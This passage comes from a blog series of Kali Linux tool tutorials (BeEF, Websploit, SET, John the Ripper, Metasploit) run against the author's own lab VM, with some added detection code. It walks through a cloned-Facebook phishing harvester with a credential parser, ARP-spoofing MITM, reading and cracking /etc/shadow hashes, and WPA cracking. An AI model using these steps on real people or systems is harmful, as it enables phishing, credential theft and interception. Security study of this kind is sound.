This one allows the attacker to open a website by providing the URL. It won’t work on sites that refuse to be framed by another origin. That is, if you try to open Google.com, you will get the following error in the victim’s browser console.
[Error] Refused to display 'https://www.google.com/?gws_rd=ssl' in a frame because it set 'X-Frame-Options' to 'SAMEORIGIN'.
But it’s fine if you open other simple websites like http://www.heron.me/.



Execute JavaScript Code

This is the point. As the attack was triggered by the user when he/she ran hook.js, all further actions are done by passing JavaScript code from the attacker to the victim. So, “executing JavaScript code” on the attacker’s demand brings maximum flexibility.




Other

Some commands don’t show their result on the control panel, or they are shown somewhere I couldn’t find. So I switched to my favourite terminal and found the results.
They are saved in a sqlite .db file; using a sqlite tool, we can access the results:
> cd /var/lib/beef-xss
> sqlitebrowser beef.db
Check the core_results table for the results.


Reference

Wednesday, March 30, 2016

Kali Tool Series - Websploit

Although there seem to be handier tools for web exploitation than Websploit, it still interests me because its interface is similar to Metasploit’s.

To Start

> websploit

 __    __    ___  ____    _____ ____  _       ___  ____  ______
|  |__|  |  /  _]|    \  / ___/|    \| |     /   \|    ||      |
|  |  |  | /  [_ |  o  )(   \_ |  o  ) |    |     ||  | |      |
|  |  |  ||    _]|     | \__  ||   _/| |___ |  O  ||  | |_|  |_|
|  `  '  ||   [_ |  O  | /  \ ||  |  |     ||     ||  |   |  |
 \      / |     ||     | \    ||  |  |     ||     ||  |   |  |
  \_/\_/  |_____||_____|  \___||__|  |_____| \___/|____|  |__|


                --=[WebSploit FrameWork
        +---**---==[Version :2.0.5 BETA
        +---**---==[Codename :We're Not Crying Wolf
        +---**---==[Available Modules : 19
                --=[Update Date : [r2.0.5-000 2.3.2014]



wsf >

Show available modules

wsf > show modules

Web Modules                     Description
-------------------             ---------------------
web/apache_users                Scan Directory Of Apache Users
web/dir_scanner                 Directory Scanner
web/wmap                        Information Gathering From Victim Web Using (Metasploit Wmap)
web/pma                         PHPMyAdmin Login Page Scanner
web/cloudflare_resolver         CloudFlare Resolver


Network Modules                 Description
-------------------             ---------------------
network/arp_dos                 ARP Cache Denial Of Service Attack
network/mfod                    Middle Finger Of Doom Attack
network/mitm                    Man In The Middle Attack
network/mlitm                   Man Left In The Middle Attack
network/webkiller               TCP Kill Attack
network/fakeupdate              Fake Update Attack Using DNS Spoof
network/arp_poisoner            Arp Poisoner


Exploit Modules                 Description
-------------------             ---------------------
exploit/autopwn                 Metasploit Autopwn Service
exploit/browser_autopwn         Metasploit Browser Autopwn Service
exploit/java_applet             Java Applet Attack (Using HTML)


Wireless / Bluetooth Modules            Description
-------------------             ---------------------
wifi/wifi_jammer                Wifi Jammer
wifi/wifi_dos                   Wifi Dos Attack
wifi/wifi_honeypot              Wireless Honeypot(Fake AP)
bluetooth/bluetooth_pod         Bluetooth Ping Of Death Attack

Cases

Here I am going to try some modules in Websploit. The target will be my own Metasploitable2 virtual machine. Make sure you don’t try any of the actions described here against a running machine that doesn’t belong to you.

Scan Directories

We are brute-forcing directory names under the target’s web root with HTTP requests. As far as I know, DirBuster is also well known for this job. Note that this is easy for the target to notice, since lots of requests for non-existent paths are sent out in a short period.

wsf > use web/dir_scanner
wsf:Dir_Scanner > show options

Options          Value
---------       --------------
TARGET          http://google.com

wsf:Dir_Scanner > set target http://192.168.63.156
TARGET =>  192.168.63.156

wsf > run
…

However, I don’t think the program does a good job, as it doesn’t print results as it goes: the user has to wait until it completes, and that usually takes a long time.
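Noise like this is exactly what a defender looks for. The following is an added example, not part of the original post or of Websploit: a Python detector that parses web-server access-log lines in the common log format and flags any client that produces a threshold of 404 responses within a sliding time window, which is the signature a directory scanner leaves behind. The log lines are constructed for the example, and the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# One "common log format" access-log line, the shape Apache/nginx write by default:
# 192.168.63.155 - - [30/Mar/2016:17:36:16 +0800] "GET /admin/ HTTP/1.0" 404 209
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (ip, timestamp, path, status) or None when the line doesn't parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FMT)
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def find_dir_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Flag clients that produce `threshold` 404s inside a sliding `window`.

    Returns {ip: timestamp_of_the_404_that_tripped_the_alert}. A per-IP deque keeps
    only the 404 timestamps still inside the window, so memory stays bounded."""
    recent = defaultdict(deque)
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, _path, status = rec
        if status != 404:
            continue
        hits = recent[ip]
        hits.append(ts)
        while hits and ts - hits[0] > window:   # drop 404s older than the window
            hits.popleft()
        if len(hits) >= threshold and ip not in alerts:
            alerts[ip] = ts
    return alerts


def sample_log():
    """Constructed log, not real traffic: a scanner hitting twelve guessed paths in
    twelve seconds, plus one ordinary visitor with a couple of harmless 404s."""
    tz = timezone(timedelta(hours=8))
    t0 = datetime(2016, 3, 30, 17, 36, 0, tzinfo=tz)

    def entry(ip, secs, path, status):
        ts = (t0 + timedelta(seconds=secs)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.0" {status} 209'

    guesses = ["/admin/", "/backup/", "/cgi-bin/", "/config/", "/db/", "/old/",
               "/phpmyadmin/", "/test/", "/tmp/", "/upload/", "/users/", "/wp-admin/"]
    lines = [entry("192.168.63.155", i, p, 404) for i, p in enumerate(guesses)]
    lines += [entry("192.168.63.10", 5, "/", 200),
              entry("192.168.63.10", 40, "/favicon.ico", 404),
              entry("192.168.63.10", 300, "/robots.txt", 404)]
    return lines


if __name__ == "__main__":
    for ip, when in find_dir_bruteforce(sample_log()).items():
        print(f"possible directory brute-force from {ip} at {when.isoformat()}")
```

Run it and the only alert is the scanner; the ordinary visitor’s two 404s are minutes apart and never reach the threshold. A scanner that throttles itself below the window rate slips past this check, so in practice it is combined with other signals (path patterns, user agent, total request rate).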

Man in the Middle

Man in the Middle is an interesting attack. The attacker sits silently between the victim and the router, intercepts the victim’s traffic, and then forwards it on. The victim may not notice that his/her traffic is being monitored.

Attacker side:

wsf > use network/mitm
wsf:MITM > show options

Options          Value                           RQ      Description
---------       --------------                  ----    --------------
Interface       eth0                            yes     Network Interface Name
ROUTER          192.168.1.1                     yes     Router IP Address
TARGET          192.168.1.2                     yes     Target IP Address
SNIFFER         driftnet                        yes     Sniffer Name (Select From Sniffer List)
SSL             true                            yes     SSLStrip, For SSL Hijacking(true or false)


Sniffers         Description
------------    --------------
dsniff           Sniff All Passwords
msgsnarf         Sniff All Text Of Victim Messengers
urlsnarf         Sniff Victim Links
driftnet         Sniff Victim Images

wsf:MITM > set TARGET 192.168.63.156
TARGET =>  192.168.63.156
wsf:MITM > set ROUTER 192.169.63.1
ROUTER =>  192.169.63.1
wsf:MITM > set SNIFFER urlsnarf
SNIFFER =>  urlsnarf
wsf:MITM > run
[*]IP Forwarding ...
[*]ARP Spoofing ...
[*]Sniffer Starting ...
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

Then the victim starts to browse the Internet. I let the victim run wget google.com to simulate surfing.

Back on the attacker’s side, here’s what he/she received:

192.168.63.156 - - [30/Mar/2016:17:36:16 +0800] "GET http://google.com/ HTTP/1.0" - - "-" "Wget/1.10.2"
192.168.63.156 - - [30/Mar/2016:17:36:26 +0800] "GET http://www.google.com.tw/?gfe_rd=cr&ei=D577VtbIMZCS9QWylY-AAw HTTP/1.0" - - "-" "Wget/1.10.2"
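The mitm module relies on ARP spoofing: the attacker answers for the router’s IP with its own MAC, so the victim’s frames go to the attacker first. A defender on the same LAN can watch the IP-to-MAC bindings in ARP replies for the two tell-tale changes. The check below is an added example, not part of the original post or of Websploit; the ARP replies it inspects are constructed for the example (the 00:50:56 and 00:0c:29 prefixes are VMware’s, the rest of each address is made up).

```python
from collections import defaultdict

# Constructed ARP replies (sender IP, sender MAC) in the order a sniffer on the LAN
# would see them. The OUIs 00:50:56 and 00:0c:29 belong to VMware; the addresses
# themselves are made up for the example.
SAMPLE_REPLIES = [
    ("192.168.63.1",   "00:50:56:c0:00:08"),  # router / host adapter, legitimate
    ("192.168.63.156", "00:0c:29:12:34:56"),  # victim (Metasploitable)
    ("192.168.63.155", "00:0c:29:aa:bb:cc"),  # attacker (Kali)
    ("192.168.63.1",   "00:50:56:c0:00:08"),  # normal refresh, same binding
    ("192.168.63.1",   "00:0c:29:aa:bb:cc"),  # attacker now claims the router's IP
    ("192.168.63.156", "00:0c:29:aa:bb:cc"),  # ... and the victim's IP (towards the router)
]


def detect_arp_spoof(replies):
    """Walk ARP replies in order and return a list of findings:
      ("ip_mac_change", ip, old_mac, new_mac)  an IP that moved to a different MAC
      ("mac_multi_ip", mac, (ip, ip, ...))     a MAC answering for more than one IP
    A poisoner produces both: it rebinds the gateway's IP to itself while still
    answering for its own IP."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    findings = []
    for ip, mac in replies:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            findings.append(("ip_mac_change", ip, prev, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) == 2:  # report once, when a second IP appears
            findings.append(("mac_multi_ip", mac, tuple(sorted(mac_to_ips[mac]))))
    return findings


if __name__ == "__main__":
    for finding in detect_arp_spoof(SAMPLE_REPLIES):
        print(finding)
```

A legitimate change (a replaced NIC, a DHCP lease moving to another host) also trips the first check, so treat the gateway’s binding as the high-signal one. The usual mitigation on a host you care about is a static ARP entry for the gateway (arp -s), which spoofed replies cannot overwrite.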

Reference

Tuesday, March 29, 2016

Kali Tool Series - Maltego

Maltego is a reconnaissance tool built into Kali and developed by Paterva. It’s a powerful information-gathering tool that covers everything from Internet infrastructure to personal information and social networks.

Palette

Palette here refers to the object types Maltego supports for drawing the graph of the target. Each type stands for an item in the real world and carries the relevant attributes. By running transforms, we can expand one object into the whole network of interest.
Maltego provides the following types in the Palette:
  • Device
  • Infrastructure
    • AS
    • DNS Name
    • Domain
    • IPv4 Address
    • MX Record
    • NS Record
    • Netblock
    • URL
    • UniqueIdentifier
    • Website
  • Locations
    • Circular Area
    • GPS Coordinate
    • Location
  • Personal
    • Alias
    • Document
    • Email Address
    • Image
    • Person
    • Phone Number
    • Phrase
  • Social Network
    • Facebook
    • Twitter

Steps

Step 1 - Open Maltego
Open Maltego from the Applications menu → Information Gathering → Maltego (or just type maltego in a Terminal), then register an account and select the transform seeds to install.
Step 2 - Pick a Start Node
You can start from a website URL, a person, or anything else listed above in the Palette.
Step 3 - Expand
Right-click on the object, then run a transform, which expands the graph by adding connections to other objects.

Example Output


Information gathering starting from my domain, heron.me.


Information gathering starting from me, "Heron Yang".

Transform Seeds

Seeds are small pieces of XML that tell the Maltego client where (on which servers) it should look for transforms. A seed can be thought of as something like the index of a book, which tells you where the relevant content is located.

Reference

Friday, March 25, 2016

Kali Tool Series - The Social-Engineer Toolkit

Preface

“Social Engineering” is a sub-field of security. It has little to do with technical details; it is about deceiving people in order to get into a system you are not authorized to use.

The content here is for study purposes only. One SHOULD NOT deploy it in a real-world environment, which is illegal. While practising, make sure you test on your own machines only and don’t deceive people.

Build a Phishing Website

For the basic example, we build a fake login website that collects the usernames and passwords people type in.
> setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

             Visit: https://www.trustedsec.com

 Select from the menu:

   1) Social-Engineering Attacks
   2) Fast-Track Penetration Testing
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) Third Party Modules

  99) Return back to the main menu.
  
set> 2

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack> 3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.

   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>1
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
Then it asks for the IP of your Kali machine, which you can get from the ifconfig command. Mine is 192.168.63.155.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155

  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo
  
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.63.155
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com/

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Apache is set to ON - everything will be placed in your web root directory of apache.
[*] Files will be written out to the root directory of apache.
[*] ALL files are within your Apache directory since you specified it to ON.
Apache webserver is set to ON. Copying over PHP file to the website.
Please note that all output from the harvester will be found under apache_dir/harvester_date.txt
Feel free to customize post.php in the /var/www directory
[*] All files have been copied to /var/www
{Press return to continue}
Now you’re all set. By default the files are generated in /var/www/. However, we have to move them into /var/www/html/, which is Apache’s default document root on Kali.
> cd /var/www/
> mkdir html/facebook
> mv index.html html/facebook/
> mv post.php har*txt html/
Okay, then open the URL (mine is http://192.168.63.155/facebook/) on any machine that can reach your Kali machine.



Finally, you will find the username and password in the harvester_….txt file:
> cat /var/www/html/har*.txt
Array
(
    [lsd] => AVqaOX85
    [display] =>
    [enable_profile_selector] =>
    [isprivate] =>
    [legacy_return] => 1
    [profile_selector_ids] =>
    [skip_api_login] =>
    [signed_next] =>
    [trynum] => 1
    [timezone] => -825
    [lgndim] => eyJ3IjoxNDQwLCJoIjo5MDAsImF3IjoxNDQ… =
    [lgnrnd] => 194144_MLVw
    [lgnjs] => 1458894004
    [email] => apple
    [pass] => banana
    [login] => 1
    [default_persistent] => 0
    [qsstamp] => W1tbOSwxMiwWEtwbVV6am45Zzd3…
)
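The harvester file is PHP print_r() output, one Array block per captured POST. Once a cloned page has been up for a while you want to review all of them at once rather than reading raw dumps. The parser below is an added example, not part of the original post or of SET; it splits the file into one record per POST and picks the credential pair out by field name. The input is a constructed two-POST file in the same format as the dump above, and the list of field-name pairs is an assumption covering common login forms.

```python
import re

# One "[key] => value" line of PHP print_r() output; the value may be empty.
FIELD_RE = re.compile(r'^\s*\[(?P<key>[^\]]*)\] =>\s?(?P<value>.*)$')

# Field-name pairs that carry the login and the secret on common login forms
# (assumed list; extend it for the form you cloned).
CRED_KEYS = (("email", "pass"), ("username", "password"), ("user", "passwd"))


def parse_harvester(text):
    """Split harvester output into one dict per 'Array ( ... )' block (one per POST)."""
    records = []
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "Array":
            current = {}
        elif stripped == ")" and current is not None:
            records.append(current)
            current = None
        elif current is not None:
            m = FIELD_RE.match(line)
            if m:
                current[m.group("key")] = m.group("value").rstrip()
    return records


def extract_credentials(records):
    """Return (login, secret) for each record that has a recognised field pair."""
    creds = []
    for rec in records:
        for user_key, pass_key in CRED_KEYS:
            if user_key in rec and pass_key in rec:
                creds.append((rec[user_key], rec[pass_key]))
                break
    return creds


# Constructed two-POST harvester file in the same print_r format SET writes.
SAMPLE = """Array
(
    [lsd] => AVqaOX85
    [display] =>
    [email] => apple
    [pass] => banana
    [login] => 1
)
Array
(
    [lsd] => Qz9k3pLm
    [display] =>
    [email] => alice@example.com
    [pass] => hunter2
    [login] => 1
)
"""

if __name__ == "__main__":
    for login, secret in extract_credentials(parse_harvester(SAMPLE)):
        print(f"{login}: {secret}")
```

The parser keeps every field, not just the credentials, because the extra hidden fields (lsd, lgnjs, timezone and the like above) are what tell you whether a capture came from a real browser session or from someone poking at the page.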

Saturday, March 19, 2016

Kali Tool Series - John the Ripper

John the Ripper is a tool for recovering passwords from their hashes by guessing (wordlist and brute-force attacks). Make sure you don’t apply any of the following to other people’s accounts or services; try only your own.

Get Password of an Unix-like Machine

The following only works on a Unix-like machine to which you already have file access. That is, we need /etc/passwd and /etc/shadow (only /etc/passwd on ancient systems, which kept the hashes there). Reading /etc/shadow requires root.

> unshadow /etc/passwd /etc/shadow > ~/passwd

Run John in its default modes (single crack, then its built-in word list, then incremental) to crack the passwords:

> john ~/passwd

Use custom wordlist:

> john --wordlist=word.list ~/passwd

where word.list is your custom list.

To show the result:

> john --show ~/passwd
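unshadow is simpler than it looks: it joins /etc/passwd and /etc/shadow on the user name so the hash lands in the second field, where John expects it. The following Python is an added example, not part of the original post or of John the Ripper. It reimplements that merge on constructed passwd and shadow fragments (the hash strings are dummies with the right prefix and length, not hashes of any real password) and adds a helper that identifies the hash scheme from the crypt(3) $id$ prefix, so before starting a long job you know which format John will pick and which accounts are locked or passwordless and not worth cracking at all.

```python
# crypt(3) hash prefixes as used in /etc/shadow on Linux, mapped to the scheme name
# (and hence the John format you should expect to see in its output).
CRYPT_PREFIXES = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}


def identify_hash(field):
    """Classify the password field of a shadow entry.
    Returns a scheme name, or 'empty' (no password), 'locked' ('!' or '*' prefix),
    'descrypt' (13-character traditional DES crypt) or 'unknown'."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in CRYPT_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"
    return "unknown"


def unshadow(passwd_lines, shadow_lines):
    """Do what unshadow(8) does: for each passwd entry whose password field is the
    'x' placeholder, substitute the hash from the shadow entry of the same user."""
    hashes = {}
    for line in shadow_lines:
        line = line.strip()
        if line and not line.startswith("#"):
            user, hash_field = line.split(":", 2)[:2]
            hashes[user] = hash_field
    merged = []
    for line in passwd_lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if fields[1] == "x" and fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def crackable_accounts(merged):
    """From unshadow output, return {user: scheme} for accounts that carry a real hash;
    locked, empty and unrecognised fields are skipped since John can do nothing with them."""
    result = {}
    for line in merged:
        fields = line.split(":")
        scheme = identify_hash(fields[1])
        if scheme not in ("empty", "locked", "unknown"):
            result[fields[0]] = scheme
    return result


# Constructed passwd/shadow fragments. The hash strings are dummies with the right
# prefix and length, not hashes of any real password.
PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh",
    "msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash",
    "guest:x:1001:1001:,,,:/home/guest:/bin/bash",
    "service:x:1002:1002:,,,:/home/service:/bin/bash",
]
SHADOW = [
    "root:$1$saltsalt$" + "0" * 22 + ":14747:0:99999:7:::",
    "daemon:*:14684:0:99999:7:::",
    "msfadmin:$6$saltsalt$" + "0" * 86 + ":14747:0:99999:7:::",
    "guest:ab" + "0" * 11 + ":14684:0:99999:7:::",
    "service:!:14684:0:99999:7:::",
]

if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)
    print("\n".join(merged))
    print(crackable_accounts(merged))
```

The scheme matters for planning: md5crypt and descrypt fall quickly to a wordlist, while sha512crypt and bcrypt are deliberately slow, so the same wordlist run can take hours instead of minutes.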

Crack Wifi

Use Wordlist (WPA2)

Use Wireshark or airodump-ng to capture the traffic, including the WPA handshake, into a .cap file. Then:

> aircrack-ng -w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap

where the -b option gives the BSSID (the access point’s MAC address) you are targeting, and the input files are the .cap captures.

Try All

Another approach is to try every possible password, which is guaranteed to find it eventually, but it might also take forever.

> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap

Session Control

To run a long cracking job, we can start it in the background as a named session:

> john --session=all_rules_session --wordlist=all.lst ~/passwd &

To check the session status:

> john --status=all_rules_session
0g 0:00:00:02  2/3 0g/s 411.5p/s 411.5c/s 411.5C/s

To restore the session:

> john --restore=all_rules_session

Password Wordlist

Longer wordlists can be found online. However, there are some wordlists already on Kali for users to apply.

> ls /usr/share/wordlists/
dirb  dirbuster  dnsmap.txt  fasttrack.txt  fern-wifi  metasploit  metasploit-jtr  nmap.lst  rockyou.txt.gz  sqlmap.txt  termineter.txt  wfuzz

They are wordlist files from different applications:

> file /usr/share/wordlists/*
/usr/share/wordlists/dirb:           symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster:      symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz:          symbolic link to /usr/share/wfuzz/wordlist

Interestingly, the best wordlist is actually tucked away compressed in rockyou.txt.gz, so:

> gzip -dc < rockyou.txt.gz > ~/wordlist.txt

then we have wordlist.txt.

Resource

Monday, March 14, 2016

Kali Tool Series - Nessus

Nessus is a vulnerability scanner (open source in its early versions, proprietary since version 3) that scans a network for potential security risks and provides detailed reports.
A few facts about Nessus:
  • started by Renaud Deraison in 1998
  • supports multiple systems: Windows, Linux, Mac OS X, Sun Solaris, etc.

Feature

  • host/port discovery
  • identifies vulnerabilities
  • checks whether the systems have the latest software patches
  • tries with default passwords, common passwords on system accounts
  • malware/botnet detection
(from reference 1 and reference 2)

Install and Setup

Download Nessus from its official site (registration is required; the Home version is free).
After installation, open https://localhost:8834/ on your machine to start Nessus.

Component

  • Reports: reports from all the past scans of a target or a set of targets
  • Scans: configure or run a new scan
  • Policies: configure the things you would like to run for the scans
  • Users: different users may have different permission to apply different policies
(Reference)

Policy

Open https://localhost:8834/, and click on “+New Policy” button in the Policy tab.
The information of scanner templates provided by the policy wizard can be found here.

Settings

  • Basics
    • general: name / description
    • permission: private / share
  • Discovery: host discovery / port scanning / service discovery
  • Assessment: for “web application” only
  • Report: configure the scan reports
  • Advanced: performance settings, additional checks, and logging features

Scan

Click the “+New Scan” button, then pick a scanner template or a user-created policy.

General

  • name
  • description
  • folder
  • scanner
  • targets: IP or domain name (ex. 192.168.1.0/24, 192.168.2.1, example.com)
  • upload targets: a file that contains target list

Schedule

Default is disabled.
  • launch: pick its frequency - once, daily, weekly, monthly, or yearly
  • starts on: start time
  • time zone
  • summary

Email Notification

Setting up SMTP is required.

Launch

Click the play icon or the “Launch” button and the scan starts right away.

View Results

The result page

  • Configure: directs back to the scan settings
  • Audit Trail: pulls up the audit trail dialogue
  • Launch
  • Export: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.

Turn On/Off Nessus

Nessus runs as a service in the background by default. On Mac OS X, to turn it on:
sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
To turn it off:
sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist

Saturday, March 12, 2016

Kali Tool Series - Metasploit

Preface

This is the first post of Kali Tool Series I wrote as my own studying notes.

Introduction

Metasploit is a vulnerability and exploitation framework with a collection of exploits, designed for security professionals to perform security assessments.

Few facts about Metasploit:

  • written in Ruby
  • acquired by Rapid7
  • integrates with other common penetration testing tools: Nessus, Nmap

Also, it’s worth knowing that a successful service exploitation requires the following elements (reference):

  • vulnerability: a flaw in a system which can be utilized as an avenue of attack
  • exploit: a program specifically designed to leverage a vulnerability
  • payload: code to be run on the system after the vulnerability has been exploited

Modules

Before starting, it’s better to briefly understand the modules, which can be roughly grouped as follows (reference is here):

Auxiliary modules

Useful tools for:

  • information gathering
  • enumeration
  • port scanning
  • connecting to SQL databases
  • etc

Exploit modules

Modules used to deliver exploit code to a target system.

Post modules

Post exploitation tools for things like extracting passwords hashes/access tokens, taking screenshots, key-logging and downloading files.

Payload modules

Malicious payloads run after exploitation. In Metasploit, it’s usually best to pick a “meterpreter” payload, which smoothly opens a Meterpreter session (a backdoor) on the target.

Testing Environment

Okay, since what we are doing here may make changes (or, you could say, damage) to the target machine, we can’t do it on a deployed machine without permission. Therefore I set up a Metasploitable virtual machine as my target, which contains lots of vulnerabilities by default.

Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.

Working Flow

Here’s a demo flow using Metasploit.

1. Information Gathering

Host Discovery

First, we have to locate the machine by scanning my local network (192.168.63.x).

I’m using ARP scanning:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   RHOSTS                      yes       The target address range or CIDR identifier
   SHOST                       no        Source IP Address
   SMAC                        no        Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    5                yes       The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, 192.168.63.156 would be our target machine, since the others (.1, .2 and .254) are VMware’s own virtual-network addresses rather than normal devices.

In addition, of course, one can use Nmap to do all the work for this part instead (-sV also does the service-version detection covered below):

nmap -v -sV 192.168.63.1/24

Port Scanning

Then we scan the open ports of our target machine (192.168.63.156):

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.63.156   yes       The target address range or CIDR identifier
   THREADS      50               yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (dismiss)

Knowing which ports are open tells us which services are running on it.

2. Find Vulnerability

To find a vulnerability, we need to know the version of each service and look it up in a vulnerability database to see if there’s any known flaw.

Find Versions

SSH:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run

[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

FTP:

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run

[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the target machine is running vsFTPd 2.3.4.

Check Database

Let’s focus on vsFTPd, which is more likely to be vulnerable than SSH. Go to exploit-db, search for the keyword “vsFTPd”, and luckily we find “VSFTPD 2.3.4 - Backdoor Command Execution”.

To sum up what we’ve got so far: the target machine is running an outdated service with a well-known flaw.

Find the Exploit Method

Then, let’s search for it in Metasploit:

msf > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

Nice, the module exploit/unix/ftp/vsftpd_234_backdoor is what we need now.
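Steps 1 and 2 above boil down to: connect to each port, read the greeting, and match the version against what you know is vulnerable. The following is an added example, not part of the original post or of Metasploit, that does exactly that in Python: a TCP connect scan with a banner grab, a couple of banner patterns, and a tiny table mapping the vsFTPd 2.3.4 banner found above to the module found above. Instead of the Metasploitable VM it talks to throwaway loopback listeners started inside the script, so it runs offline; the listener banners and the pattern list are the example’s own.

```python
import re
import socket
import threading

# Banner patterns -> (product, version). The two services are the ones found above.
BANNER_PATTERNS = [
    ("vsftpd",  re.compile(r"\(vsFTPd (?P<ver>[0-9.]+)\)", re.IGNORECASE)),
    ("openssh", re.compile(r"OpenSSH_(?P<ver>[0-9][\w.]*)")),
]

# Known-vulnerable (product, version) -> Metasploit module, from the search above.
KNOWN_VULNERABLE = {
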